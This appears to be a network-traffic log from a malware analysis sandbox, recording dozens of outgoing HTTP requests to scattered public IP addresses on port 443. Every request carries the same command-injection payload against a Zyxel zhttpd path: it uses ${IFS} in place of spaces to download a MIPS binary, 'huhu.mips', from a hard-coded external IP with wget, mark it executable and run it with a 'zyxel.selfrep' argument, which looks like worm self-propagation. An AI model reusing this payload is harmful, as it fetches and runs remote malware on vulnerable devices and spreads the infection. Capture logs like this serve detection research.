                                                      Feb 2, 2024 06:36:13.074311018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9381192.168.2.146003020.128.93.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074354887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9382192.168.2.145197883.214.9.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074382067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9383192.168.2.1451024178.248.129.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074423075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9384192.168.2.1459786122.101.253.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074481010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9385192.168.2.1439980114.31.85.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074505091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9386192.168.2.1439562198.228.248.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074543953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9387192.168.2.145979059.208.127.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074568033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9388192.168.2.1452226165.165.175.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074588060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9389192.168.2.14368762.26.98.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074608088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9390192.168.2.1435860211.189.216.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074667931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9391192.168.2.145836435.20.79.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074721098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9392192.168.2.1434834120.37.165.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074743986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9393192.168.2.1442416148.246.43.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074779987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9394192.168.2.1442130210.229.50.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074824095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9395192.168.2.1452386148.235.191.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074871063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9396192.168.2.145830247.245.205.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074903011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9397192.168.2.144773032.230.113.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074949980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9398192.168.2.144676627.223.150.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074995041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9399192.168.2.144864439.162.248.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075030088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9400192.168.2.1433322174.149.250.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075078011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9401192.168.2.144493849.99.10.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075109005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9402192.168.2.14408008.249.254.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075134993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9403192.168.2.145368236.95.65.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075164080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9404192.168.2.1446374184.65.117.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075205088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9405192.168.2.1432924149.214.207.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075258017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9406192.168.2.143536663.113.185.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075310946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9407192.168.2.144613437.232.207.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075340033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9408192.168.2.1432830197.3.128.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075376987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9409192.168.2.1448458153.155.246.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075404882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9410192.168.2.1441006195.239.31.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075472116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9411192.168.2.145696474.151.120.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075534105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9412192.168.2.14514402.24.147.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075578928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9413192.168.2.144170614.134.148.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075601101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9414192.168.2.1435946136.242.36.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075663090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9415192.168.2.1447748223.152.145.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075696945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9416192.168.2.1434506170.185.36.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075742006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9417192.168.2.1447710107.247.234.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075798035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9418192.168.2.145119477.93.101.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075818062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9419192.168.2.1444544196.244.180.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075860977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9420192.168.2.144365895.212.231.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075913906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9421192.168.2.1453122222.87.87.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075954914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9422192.168.2.144142657.201.183.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.075994968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9423192.168.2.144281034.151.115.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076009035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9424192.168.2.1451358212.154.14.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076059103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9425192.168.2.1452476147.56.22.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076093912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9426192.168.2.1449402176.50.253.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076158047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9427192.168.2.1460594161.102.129.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076169014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9428192.168.2.1451814104.49.14.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076198101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9429192.168.2.144365627.139.219.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076231003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9430192.168.2.1455106105.6.16.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076272964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9431192.168.2.1459172155.117.62.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076323986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9432192.168.2.1458908209.121.95.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076359034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9433192.168.2.1450708186.83.211.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076385021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9434192.168.2.143713673.10.201.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076436043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9435192.168.2.145986469.203.180.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076487064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9436192.168.2.1433086142.106.198.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076548100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9437192.168.2.1434814143.178.212.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076567888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9438192.168.2.1433512179.29.224.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076620102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9439192.168.2.1439850117.20.68.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076668024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9440192.168.2.1455564190.87.183.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076704979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9441192.168.2.1439830165.29.175.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076733112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9442192.168.2.1450844169.158.90.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076762915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9443192.168.2.1454914102.111.3.57443
                                                      TimestampBytes transferredDirectionData
